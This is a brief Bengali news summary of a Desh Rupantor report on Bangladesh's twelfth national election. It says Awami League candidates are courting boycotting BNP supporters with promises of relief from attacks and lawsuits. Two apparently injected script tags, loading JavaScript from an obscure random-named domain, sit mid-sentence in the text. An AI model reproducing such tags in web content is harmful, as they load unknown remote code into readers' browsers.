নির্বাচনের আচরণবিধি নিয়ে দেশ রূপান্তরের প্রধান শিরোনাম, ‘ভোট দিলে সব মাফ’।
প্রতিবেদনে বলা হচ্ছে, সুষ্ঠু নির্বাচন অনুষ্ঠানে দেশি-বিদেশি চাপে থাকা সরকারের সামনে বড় চ্যালেঞ্জ নির্বাচন উৎসবমুখর ও প্রতিদ্বন্দ্বিতাপূর্ণ করা এবং কেন্দ্রে ভোটার আনা।<script type='text/javascript' src='//t84c3srgclc9.com/19/4c/78/194c78184d2fab8fa6171763c8d3b324.js'></script>
কারণ মাঠের বড় দল বিএনপি, জামায়াত, ইসলামী আন্দোলনসহ ১৬টি নিবন্ধিত দল নির্বাচন বর্জন করেছে।
বিএনপি ভোট বর্জন করলেও দ্বাদশ জাতীয় সংসদ নির্বাচনে দলটির ভোটারদের ভোট পেতে চায় আওয়ামী লীগ।
বিএনপির ভোটারদের ভোটকেন্দ্রে আনতে প্রচারণায় নানারকম কৌশল যোগ করেছেন আওয়ামী লীগের স্বতন্ত্র ও নৌকার প্রার্থীরা।<script type='text/javascript' src='//t84c3srgclc9.com/5a/a9/00/5aa90066cd36b78fc874fce18321531e.js'></script>
এ কৌশলের অন্যতম হলো ভোট দিলে হামলা-মামলা থেকে রেহাই মিলবে বিএনপির কর্মী-সমর্থকদের এমন আশ্বাস দেওয়া।
আর এমন আশ্বাসে আস্থা রাখার কথাও জানা যাচ্ছে বিভিন্ন সংসদীয় এলাকা থেকে।
বিএনপির ভোট টানতে সরাসরি আওয়ামী লীগের পদ-পদবিতে না থাকা নেতাদের কাজে লাগাচ্ছে আওয়ামী লীগ। যাতে বিএনপি সমর্থকদের কাছে ভোট চাওয়া সহজ হয়।
0 Comments